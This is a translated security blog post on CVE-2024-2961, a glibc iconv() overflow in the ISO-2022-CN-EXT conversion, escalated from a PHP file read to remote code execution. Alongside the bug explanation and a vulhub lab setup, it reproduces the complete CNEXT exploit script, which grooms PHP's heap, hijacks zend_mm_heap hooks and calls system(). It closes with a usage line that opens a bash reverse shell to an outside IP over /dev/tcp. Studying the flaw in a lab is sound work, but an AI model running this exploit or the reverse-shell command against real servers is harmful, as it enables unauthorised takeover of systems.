Buffer overflow vulnerability in glibc iconv()

Escalating a php://filter arbitrary file read to remote code execution (RCE)

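How the vulnerability works

In glibc 2.39 and earlier, the iconv() function can overflow the output buffer passed to it by up to 4 bytes when converting a string to the ISO-2022-CN-EXT character set. This can crash the application or overwrite an adjacent variable.

iconv() is the character-encoding conversion API provided by glibc: it takes input in one encoding and emits it in another, for example turning GBK-encoded input into UTF-8 output. When UTF-8 encoded rare Chinese characters such as "劄", "䂚", "峛" or "湿" (Chinese characters really are vast and profound) are converted to ISO-2022-CN-EXT, the output buffer overflows by 1 to 3 bytes.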
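To make the idea of an encoding conversion concrete, here is a minimal sketch using Python's built-in codecs. It does not call glibc's iconv(), and Python ships no ISO-2022-CN-EXT codec, so the overflow itself is not reproduced; the helper name `convert` is made up for this example. It only shows a GBK to UTF-8 conversion and that each trigger character occupies three bytes in UTF-8.

```python
# Illustration only: Python's own codecs, not glibc iconv().
TRIGGERS = ["劄", "䂚", "峛", "湿"]


def convert(data: bytes, src: str, dst: str) -> bytes:
    """Decode `data` from encoding `src` and re-encode it as `dst`."""
    return data.decode(src).encode(dst)


gbk_bytes = "湿".encode("gbk")
utf8_bytes = convert(gbk_bytes, "gbk", "utf-8")
print("GBK length:", len(gbk_bytes), "UTF-8 length:", len(utf8_bytes))

for ch in TRIGGERS:
    # Print the code point and the UTF-8 bytes rather than the glyph itself.
    print(f"U+{ord(ch):04X}", ch.encode("utf-8").hex())
```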

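Conditions for exploitation

In theory PHP 7.0.0 through 8.3.7 is affected, and the vulnerability is usable in any of the following situations:

1. file_get_contents($_GET['file']);

2. An arbitrary file read combined with getimagesize($_GET['file']);, or XXE, and so on

3. Bypassing disable_functions

Controllable sinks include file_get_contents(), file(), readfile(), fgets(), getimagesize(), SplFileObject->read(), etc.
File write operations are affected as well (for example file_put_contents() and similar functions).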
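As a rough first check of the glibc side of these conditions, the sketch below reads the local C library version with Python's `platform.libc_ver()` and compares it with 2.39. The function names are hypothetical, and the result is only a hint: distributions commonly backport fixes without changing the version number, so a version inside the range does not prove the system is vulnerable.

```python
from __future__ import annotations

import platform
import re


def parse_glibc_version(text: str) -> tuple[int, int] | None:
    """Extract (major, minor) from strings such as 'glibc 2.35' or '2.35'."""
    match = re.search(r"(\d+)\.(\d+)", text)
    return (int(match.group(1)), int(match.group(2))) if match else None


def in_affected_range(version: tuple[int, int]) -> bool:
    """True when the version is 2.39 or earlier (the range stated above)."""
    return version <= (2, 39)


name, version = platform.libc_ver()
parsed = parse_glibc_version(version) if name == "glibc" else None
if parsed is None:
    print("glibc not detected on this system")
else:
    print(parsed, "in affected version range:", in_affected_range(parsed))
```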

Environment setup

git clone https://github.com/vulhub/vulhub.git
cd vulhub/php/CVE-2024-2961/
sudo docker-compose up -d

Cloning the whole vulhub repository is heavy. Alternatively, create the docker-compose template below together with an index.php and that is enough.

index.php

<?php    
$data = file_get_contents($_POST['file']);
echo "File contents: $data";

docker-compose.yml

version: '2'
services:
  web:
    image: vulhub/php:8.3.4-apache
    volumes:
      - ./index.php:/var/www/html/index.php
    ports:
      - "8080:80"
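Once the container is up, the index.php above expects a POST form field named `file`. The following sketch builds that request with the Python standard library; the helper names and the URL `http://127.0.0.1:8080/index.php` are assumptions based on the port mapping in the compose file, not something the original setup prescribes.

```python
from urllib.parse import urlencode
from urllib.request import Request, urlopen


def build_request(url: str, path: str) -> Request:
    """Build the POST that index.php expects: a form field named `file`."""
    body = urlencode({"file": path}).encode()
    return Request(url, data=body, method="POST")


def read_file(url: str, path: str) -> bytes:
    """Send the request and return the raw response body."""
    with urlopen(build_request(url, path), timeout=10) as response:
        return response.read()
```

Against a local test container, `read_file("http://127.0.0.1:8080/index.php", "/etc/passwd")` should return the page output beginning with `File contents: `.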

Reproduction

Ordinarily, filters are only used to read arbitrary files:

php://filter/convert.base64-encode/resource=xxx
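The base64 filter is useful because it makes the file contents safe to carry in an HTML response, binary files included. A minimal sketch of both halves, building the path and decoding what comes back, might look like this. The function names are illustrative, and the `File contents: ` prefix is the one printed by the sample index.php.

```python
import base64
import re


def base64_filter_path(resource: str) -> str:
    """Wrap a file path in the base64-encode filter shown above."""
    return f"php://filter/convert.base64-encode/resource={resource}"


def extract_contents(body: bytes) -> bytes:
    """Take the base64 text after the 'File contents: ' prefix and decode it."""
    match = re.search(rb"File contents: ([A-Za-z0-9+/=]*)", body)
    if match is None:
        raise ValueError("prefix not found in response")
    return base64.b64decode(match.group(1))


# A fabricated response body, standing in for what the server would return.
sample = b"File contents: " + base64.b64encode(b"root:x:0:0:root:/root:/bin/bash\n")
print(base64_filter_path("/etc/passwd"))
print(extract_contents(sample))
```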

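With this vulnerability, filters and the overflow are combined to achieve RCE.

The target endpoint allows arbitrary file reads, so a file can be read through the conversion filter: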

php://filter/convert.iconv.UTF-8.ISO-2022-CN-EXT/resource=/etc/passwd

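With a fully controllable file_get_contents, first read /proc/self/maps to obtain the libc base address and the absolute path of libc.so, then read libc.so itself. That yields the real addresses of every function needed, and hijacking custom_heap then leads to code execution.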
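The first step, locating libc from /proc/self/maps, is plain text parsing. Below is a minimal standard-library sketch run against a made-up sample; the addresses, paths, and the names `Mapping`, `parse_maps` and `libc_base` are all illustrative and are not taken from a real target.

```python
from __future__ import annotations

import re
from typing import NamedTuple


class Mapping(NamedTuple):
    start: int
    stop: int
    perms: str
    path: str


# Fields: address range, permissions, offset, device, inode, optional pathname.
LINE = re.compile(
    r"^([0-9a-f]+)-([0-9a-f]+)\s+([-rwx]{3}[ps])\s+\S+\s+\S+\s+\S+\s*(.*)$"
)


def parse_maps(text: str) -> list[Mapping]:
    """Parse the text of /proc/<pid>/maps into Mapping tuples."""
    mappings = []
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if m:
            mappings.append(Mapping(int(m[1], 16), int(m[2], 16), m[3], m[4]))
    return mappings


def libc_base(mappings: list[Mapping]) -> tuple[int, str]:
    """Return (lowest start address, path) of the libc mapping."""
    libc = [m for m in mappings if "libc.so" in m.path or "libc-" in m.path]
    if not libc:
        raise LookupError("libc not found in mappings")
    first = min(libc, key=lambda m: m.start)
    return first.start, first.path


SAMPLE = """\
55d0c0a00000-55d0c0a2c000 r--p 00000000 08:01 123 /usr/sbin/apache2
7f1c2a000000-7f1c2a200000 rw-p 00000000 00:00 0
7f1c2b600000-7f1c2b628000 r--p 00000000 08:01 456 /usr/lib/x86_64-linux-gnu/libc.so.6
7f1c2b628000-7f1c2b7bd000 r-xp 00028000 08:01 456 /usr/lib/x86_64-linux-gnu/libc.so.6
"""

base, path = libc_base(parse_maps(SAMPLE))
print(hex(base), path)
```

With the base known, a function's runtime address is the base plus that symbol's offset inside the downloaded libc.so. The exploit script below gets this through the pwntools ELF class by setting its `address` attribute.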

POC

Exploit script

Setup

wget https://raw.githubusercontent.com/ambionics/cnext-exploits/main/cnext-exploit.py
pip3 install pwntools
pip3 install https://github.com/cfreal/ten/archive/refs/heads/main.zip

cnext-exploit.py

#!/usr/bin/env python3
#
# CNEXT: PHP file-read to RCE (CVE-2024-2961)
# Date: 2024-05-27
# Author: Charles FOL @cfreal_ (LEXFO/AMBIONICS)
#
# TODO Parse LIBC to know if patched
#
# INFORMATIONS
#
# To use, implement the Remote class, which tells the exploit how to send the payload.
#

from __future__ import annotations

import base64
import zlib

from dataclasses import dataclass
from requests.exceptions import ConnectionError, ChunkedEncodingError

from pwn import *
from ten import *


HEAP_SIZE = 2 * 1024 * 1024
BUG = "劄".encode("utf-8")


class Remote:
    """A helper class to send the payload and download files.

    The logic of the exploit is always the same, but the exploit needs to know how to
    download files (/proc/self/maps and libc) and how to send the payload.

    The code here serves as an example that attacks a page that looks like:

    ```php
    <?php

    $data = file_get_contents($_POST['file']);
    echo "File contents: $data";
    ```

    Tweak it to fit your target, and start the exploit.
    """

    def __init__(self, url: str) -> None:
        self.url = url
        self.session = Session()

    def send(self, path: str) -> Response:
        """Sends given `path` to the HTTP server. Returns the response."""
        return self.session.post(self.url, data={"file": path})

    def download(self, path: str) -> bytes:
        """Returns the contents of a remote file."""
        path = f"php://filter/convert.base64-encode/resource={path}"
        response = self.send(path)
        data = response.re.search(b"File contents: (.*)", flags=re.S).group(1)
        return base64.decode(data)


@entry
@arg("url", "Target URL")
@arg("command", "Command to run on the system; limited to 0x140 bytes")
@arg("sleep", "Time to sleep to assert that the exploit worked. By default, 1.")
@arg("heap", "Address of the main zend_mm_heap structure.")
@arg(
    "pad",
    "Number of 0x100 chunks to pad with. If the website makes a lot of heap "
    "operations with this size, increase this. Defaults to 20.",
)
@dataclass
class Exploit:
    """CNEXT exploit: RCE using a file read primitive in PHP."""

    url: str
    command: str
    sleep: int = 1
    heap: str = None
    pad: int = 20

    def __post_init__(self):
        self.remote = Remote(self.url)
        self.log = logger("EXPLOIT")
        self.info = {}
        self.heap = self.heap and int(self.heap, 16)

    def check_vulnerable(self) -> None:
        """Checks whether the target is reachable and properly allows for the various
        wrappers and filters that the exploit needs.
        """

        def safe_download(path: str) -> bytes:
            try:
                return self.remote.download(path)
            except ConnectionError:
                failure("Target not [b]reachable[/] ?")

        def check_token(text: str, path: str) -> bool:
            result = safe_download(path)
            return text.encode() == result

        text = tf.random.string(50).encode()
        base64 = b64(text, misalign=True).decode()
        path = f"data:text/plain;base64,{base64}"

        result = safe_download(path)

        if text not in result:
            msg_failure("Remote.download did not return the test string")
            print("--------------------")
            print(f"Expected test string: {text}")
            print(f"Got: {result}")
            print("--------------------")
            failure("If your code works fine, it means that the [i]data://[/] wrapper does not work")

        msg_info("The [i]data://[/] wrapper works")

        text = tf.random.string(50)
        base64 = b64(text.encode(), misalign=True).decode()
        path = f"php://filter//resource=data:text/plain;base64,{base64}"
        if not check_token(text, path):
            failure("The [i]php://filter/[/] wrapper does not work")

        msg_info("The [i]php://filter/[/] wrapper works")

        text = tf.random.string(50)
        base64 = b64(compress(text.encode()), misalign=True).decode()
        path = f"php://filter/zlib.inflate/resource=data:text/plain;base64,{base64}"

        if not check_token(text, path):
            failure("The [i]zlib[/] extension is not enabled")

        msg_info("The [i]zlib[/] extension is enabled")

        msg_success("Exploit preconditions are satisfied")

    def get_file(self, path: str) -> bytes:
        with msg_status(f"Downloading [i]{path}[/]..."):
            return self.remote.download(path)

    def get_regions(self) -> list[Region]:
        """Obtains the memory regions of the PHP process by querying /proc/self/maps."""
        maps = self.get_file("/proc/self/maps")
        maps = maps.decode()
        PATTERN = re.compile(
            r"^([a-f0-9]+)-([a-f0-9]+)\b" r".*" r"\s([-rwx]{3}[ps])\s" r"(.*)"
        )
        regions = []
        for region in table.split(maps, strip=True):
            if match := PATTERN.match(region):
                start = int(match.group(1), 16)
                stop = int(match.group(2), 16)
                permissions = match.group(3)
                path = match.group(4)
                if "/" in path or "[" in path:
                    path = path.rsplit(" ", 1)[-1]
                else:
                    path = ""
                current = Region(start, stop, permissions, path)
                regions.append(current)
            else:
                print(maps)
                failure("Unable to parse memory mappings")

        self.log.info(f"Got {len(regions)} memory regions")

        return regions

    def get_symbols_and_addresses(self) -> None:
        """Obtains useful symbols and addresses from the file read primitive."""
        regions = self.get_regions()

        LIBC_FILE = "/dev/shm/cnext-libc"

        # PHP's heap

        self.info["heap"] = self.heap or self.find_main_heap(regions)

        # Libc

        libc = self._get_region(regions, "libc-", "libc.so")

        self.download_file(libc.path, LIBC_FILE)

        self.info["libc"] = ELF(LIBC_FILE, checksec=False)
        self.info["libc"].address = libc.start

    def _get_region(self, regions: list[Region], *names: str) -> Region:
        """Returns the first region whose name matches one of the given names."""
        for region in regions:
            if any(name in region.path for name in names):
                break
        else:
            failure("Unable to locate region")

        return region

    def download_file(self, remote_path: str, local_path: str) -> None:
        """Downloads `remote_path` to `local_path`"""
        data = self.get_file(remote_path)
        Path(local_path).write(data)

    def find_main_heap(self, regions: list[Region]) -> Region:
        # Any anonymous RW region with a size superior to the base heap size is a
        # candidate. The heap is at the bottom of the region.
        heaps = [
            region.stop - HEAP_SIZE + 0x40
            for region in reversed(regions)
            if region.permissions == "rw-p"
            and region.size >= HEAP_SIZE
            and region.stop & (HEAP_SIZE-1) == 0
            and region.path in ("", "[anon:zend_alloc]")
        ]

        if not heaps:
            failure("Unable to find PHP's main heap in memory")

        first = heaps[0]

        if len(heaps) > 1:
            heaps = ", ".join(map(hex, heaps))
            msg_info(f"Potential heaps: [i]{heaps}[/] (using first)")
        else:
            msg_info(f"Using [i]{hex(first)}[/] as heap")

        return first

    def run(self) -> None:
        self.check_vulnerable()
        self.get_symbols_and_addresses()
        self.exploit()

    def build_exploit_path(self) -> str:
        """On each step of the exploit, a filter will process each chunk one after the
        other. Processing generally involves making some kind of operation either
        on the chunk or in a destination chunk of the same size. Each operation is
        applied on every single chunk; you cannot make PHP apply iconv on the first 10
        chunks and leave the rest in place. That's where the difficulties come from.

        Keep in mind that we know the address of the main heap, and the libraries.
        ASLR/PIE do not matter here.

        The idea is to use the bug to make the freelist for chunks of size 0x100 point
        lower. For instance, we have the following free list:

        ... -> 0x7fffAABBCC900 -> 0x7fffAABBCCA00 -> 0x7fffAABBCCB00

        By triggering the bug from chunk ..900, we get:

        ... -> 0x7fffAABBCCA00 -> 0x7fffAABBCCB48 -> ???

        That's step 3.

        Now, in order to control the free list, and make it point wherever we want,
        we need to have previously put a pointer at address 0x7fffAABBCCB48. To do so,
        we'd have to have allocated 0x7fffAABBCCB00 and set our pointer at offset 0x48.
        That's step 2.

        Now, if we were to perform step2 and then step3 without anything else, we'd have
        a problem: after step2 has been processed, the free list goes bottom-up, like:

        0x7fffAABBCCB00 -> 0x7fffAABBCCA00 -> 0x7fffAABBCC900

        We need to go the other way around. That's why we have step 1: it just allocates
        chunks. When they get freed, they reverse the free list. Now step2 allocates in
        reverse order, and therefore after step2, chunks are in the correct order.

        Another problem comes up.

        To trigger the overflow in step3, we convert from UTF-8 to ISO-2022-CN-EXT.
        Since step2 creates chunks that contain pointers and pointers are generally not
        UTF-8, we cannot afford to have that conversion happen on the chunks of step2.
        To avoid this, we put the chunks in step2 at the very end of the chain, and
        prefix them with `0\n`. When dechunked (right before the iconv), they will
        "disappear" from the chain, preserving them from the character set conversion
        and saving us from an unwanted processing error that would stop the processing
        chain.

        After step3 we have a corrupted freelist with an arbitrary pointer into it. We
        don't know the precise layout of the heap, but we know that at the top of the
        heap resides a zend_mm_heap structure. We overwrite this structure in two ways.
        Its free_slot[] array contains a pointer to each free list. By overwriting it,
        we can make PHP allocate chunks wherever we want. In addition, its custom_heap
        field contains pointers to hook functions for emalloc, efree, and erealloc
        (similarly to malloc_hook, free_hook, etc. in the libc). We overwrite them and
        then overwrite the use_custom_heap flag to make PHP use these function pointers
        instead. We can now do our favorite CTF technique and get a call to
        system(<chunk>).
        We make sure that the "system" command kills the current process to avoid other
        system() calls with random chunk data, leading to undefined behaviour.

        The pad blocks just "pad" our allocations so that even if the heap of the
        process is in a random state, we still get contiguous, in order chunks for our
        exploit.

        Therefore, the whole process described here CANNOT crash. Everything falls
        perfectly in place, and nothing can get in the middle of our allocations.
        """

        LIBC = self.info["libc"]
        ADDR_EMALLOC = LIBC.symbols["__libc_malloc"]
        ADDR_EFREE = LIBC.symbols["__libc_system"]
        ADDR_EREALLOC = LIBC.symbols["__libc_realloc"]

        ADDR_HEAP = self.info["heap"]
        ADDR_FREE_SLOT = ADDR_HEAP + 0x20
        ADDR_CUSTOM_HEAP = ADDR_HEAP + 0x0168

        ADDR_FAKE_BIN = ADDR_FREE_SLOT - 0x10

        CS = 0x100

        # Pad needs to stay at size 0x100 at every step
        pad_size = CS - 0x18
        pad = b"\x00" * pad_size
        pad = chunked_chunk(pad, len(pad) + 6)
        pad = chunked_chunk(pad, len(pad) + 6)
        pad = chunked_chunk(pad, len(pad) + 6)
        pad = compressed_bucket(pad)

        step1_size = 1
        step1 = b"\x00" * step1_size
        step1 = chunked_chunk(step1)
        step1 = chunked_chunk(step1)
        step1 = chunked_chunk(step1, CS)
        step1 = compressed_bucket(step1)

        # Since these chunks contain non-UTF-8 chars, we cannot let it get converted to
        # ISO-2022-CN-EXT. We add a `0\n` that makes the 4th and last dechunk "crash"

        step2_size = 0x48
        step2 = b"\x00" * (step2_size + 8)
        step2 = chunked_chunk(step2, CS)
        step2 = chunked_chunk(step2)
        step2 = compressed_bucket(step2)

        step2_write_ptr = b"0\n".ljust(step2_size, b"\x00") + p64(ADDR_FAKE_BIN)
        step2_write_ptr = chunked_chunk(step2_write_ptr, CS)
        step2_write_ptr = chunked_chunk(step2_write_ptr)
        step2_write_ptr = compressed_bucket(step2_write_ptr)

        step3_size = CS

        step3 = b"\x00" * step3_size
        assert len(step3) == CS
        step3 = chunked_chunk(step3)
        step3 = chunked_chunk(step3)
        step3 = chunked_chunk(step3)
        step3 = compressed_bucket(step3)

        step3_overflow = b"\x00" * (step3_size - len(BUG)) + BUG
        assert len(step3_overflow) == CS
        step3_overflow = chunked_chunk(step3_overflow)
        step3_overflow = chunked_chunk(step3_overflow)
        step3_overflow = chunked_chunk(step3_overflow)
        step3_overflow = compressed_bucket(step3_overflow)

        step4_size = CS
        step4 = b"=00" + b"\x00" * (step4_size - 1)
        step4 = chunked_chunk(step4)
        step4 = chunked_chunk(step4)
        step4 = chunked_chunk(step4)
        step4 = compressed_bucket(step4)

        # This chunk will eventually overwrite mm_heap->free_slot
        # it is actually allocated 0x10 bytes BEFORE it, thus the two filler values
        step4_pwn = ptr_bucket(
            0x200000,
            0,
            # free_slot
            0,
            0,
            ADDR_CUSTOM_HEAP,  # 0x18
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            ADDR_HEAP,  # 0x140
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            size=CS,
        )

        step4_custom_heap = ptr_bucket(
            ADDR_EMALLOC, ADDR_EFREE, ADDR_EREALLOC, size=0x18
        )

        step4_use_custom_heap_size = 0x140

        COMMAND = self.command
        COMMAND = f"kill -9 $PPID; {COMMAND}"
        if self.sleep:
            COMMAND = f"sleep {self.sleep}; {COMMAND}"
        COMMAND = COMMAND.encode() + b"\x00"

        assert (
            len(COMMAND) <= step4_use_custom_heap_size
        ), f"Command too big ({len(COMMAND)}), it must be strictly inferior to {hex(step4_use_custom_heap_size)}"
        COMMAND = COMMAND.ljust(step4_use_custom_heap_size, b"\x00")

        step4_use_custom_heap = COMMAND
        step4_use_custom_heap = qpe(step4_use_custom_heap)
        step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
        step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
        step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
        step4_use_custom_heap = compressed_bucket(step4_use_custom_heap)

        pages = (
            step4 * 3
            + step4_pwn
            + step4_custom_heap
            + step4_use_custom_heap
            + step3_overflow
            + pad * self.pad
            + step1 * 3
            + step2_write_ptr
            + step2 * 2
        )

        resource = compress(compress(pages))
        resource = b64(resource)
        resource = f"data:text/plain;base64,{resource.decode()}"

        filters = [
            # Create buckets
            "zlib.inflate",
            "zlib.inflate",

            # Step 0: Setup heap
            "dechunk",
            "convert.iconv.L1.L1",

            # Step 1: Reverse FL order
            "dechunk",
            "convert.iconv.L1.L1",

            # Step 2: Put fake pointer and make FL order back to normal
            "dechunk",
            "convert.iconv.L1.L1",

            # Step 3: Trigger overflow
            "dechunk",
            "convert.iconv.UTF-8.ISO-2022-CN-EXT",

            # Step 4: Allocate at arbitrary address and change zend_mm_heap
            "convert.quoted-printable-decode",
            "convert.iconv.L1.L1",
        ]
        filters = "|".join(filters)
        path = f"php://filter/read={filters}/resource={resource}"

        return path

    @inform("Triggering...")
    def exploit(self) -> None:
        path = self.build_exploit_path()
        start = time.time()

        try:
            self.remote.send(path)
        except (ConnectionError, ChunkedEncodingError):
            pass

        msg_print()

        if not self.sleep:
            msg_print("    [b white on black] EXPLOIT [/][b white on green] SUCCESS [/] [i](probably)[/]")
        elif start + self.sleep <= time.time():
            msg_print("    [b white on black] EXPLOIT [/][b white on green] SUCCESS [/]")
        else:
            # Wrong heap, maybe? If the exploit suggested others, use them!
            msg_print("    [b white on black] EXPLOIT [/][b white on red] FAILURE [/]")

        msg_print()

def compress(data) -> bytes:
    """Returns data suitable for `zlib.inflate`."""
    # Remove 2-byte header and 4-byte checksum
    return zlib.compress(data, 9)[2:-4]


def b64(data: bytes, misalign=True) -> bytes:
    payload = base64.encode(data)
    if not misalign and payload.endswith("="):
        raise ValueError(f"Misaligned: {data}")
    return payload.encode()


def compressed_bucket(data: bytes) -> bytes:
    """Returns a chunk of size 0x8000 that, when dechunked, returns the data."""
    return chunked_chunk(data, 0x8000)


def qpe(data: bytes) -> bytes:
    """Emulates quoted-printable-encode."""
    return "".join(f"={x:02x}" for x in data).upper().encode()


def ptr_bucket(*ptrs, size=None) -> bytes:
    """Creates a 0x8000 chunk that reveals pointers after every step has been run."""
    if size is not None:
        assert len(ptrs) * 8 == size
    bucket = b"".join(map(p64, ptrs))
    bucket = qpe(bucket)
    bucket = chunked_chunk(bucket)
    bucket = chunked_chunk(bucket)
    bucket = chunked_chunk(bucket)
    bucket = compressed_bucket(bucket)

    return bucket


def chunked_chunk(data: bytes, size: int = None) -> bytes:
    """Constructs a chunked representation of the given chunk. If size is given, the
    chunked representation has size `size`.
    For instance, `ABCD` with size 10 becomes: `0004\nABCD\n`.
    """
    # The caller does not care about the size: let's just add 8, which is more than
    # enough
    if size is None:
        size = len(data) + 8
    keep = len(data) + len(b"\n\n")
    size = f"{len(data):x}".rjust(size - keep, "0")
    return size.encode() + b"\n" + data + b"\n"


@dataclass
class Region:
    """A memory region."""

    start: int
    stop: int
    permissions: str
    path: str

    @property
    def size(self) -> int:
        return self.stop - self.start


Exploit()
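The helper functions at the end of the script (compress, chunked_chunk, qpe) each wrap data in an encoding that one PHP filter later undoes. The sketch below round-trips a few bytes through the same three layers using only the Python standard library. The function names are made up for this example, and the `dechunk` here is a simplified stand-in for PHP's dechunk filter that handles a single chunk only.

```python
import quopri
import zlib


def raw_deflate(data: bytes) -> bytes:
    """A zlib stream without its 2-byte header and 4-byte checksum trailer."""
    return zlib.compress(data, 9)[2:-4]


def chunk(data: bytes) -> bytes:
    """Chunked-style framing: hex length, newline, data, newline."""
    return f"{len(data):x}".encode() + b"\n" + data + b"\n"


def dechunk(data: bytes) -> bytes:
    """Undo chunk() for a single chunk (simplified)."""
    size, _, rest = data.partition(b"\n")
    return rest[: int(size, 16)]


def qp_encode_all(data: bytes) -> bytes:
    """Quoted-printable with every byte written as =XX."""
    return "".join(f"={b:02X}" for b in data).encode()


payload = b"\x00\x01ABC\xff"
wrapped = raw_deflate(chunk(qp_encode_all(payload)))

step1 = zlib.decompress(wrapped, wbits=-15)  # counterpart of zlib.inflate
step2 = dechunk(step1)                       # counterpart of dechunk
step3 = quopri.decodestring(step2)           # counterpart of quoted-printable-decode
print(step3 == payload)
```

Escaping every byte in quoted-printable keeps binary values such as pointers as plain ASCII until the final decode step, which is why the script applies qpe before chunking.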

python3 cnext-exploit.py http://IP/index.php "bash -c 'bash -i >& /dev/tcp/1.1.1.1/1234 0>&1'"





# References

https://mp.weixin.qq.com/s/hZ9yaa2exQC5hr4OKWNUsw

https://blog.csdn.net/qq_52630607/article/details/128347260

http://wiki.allinsec.cn/?p=306

https://raw.githubusercontent.com/ambionics/cnext-exploits/main/cnext-exploit.py

风尘孤狼
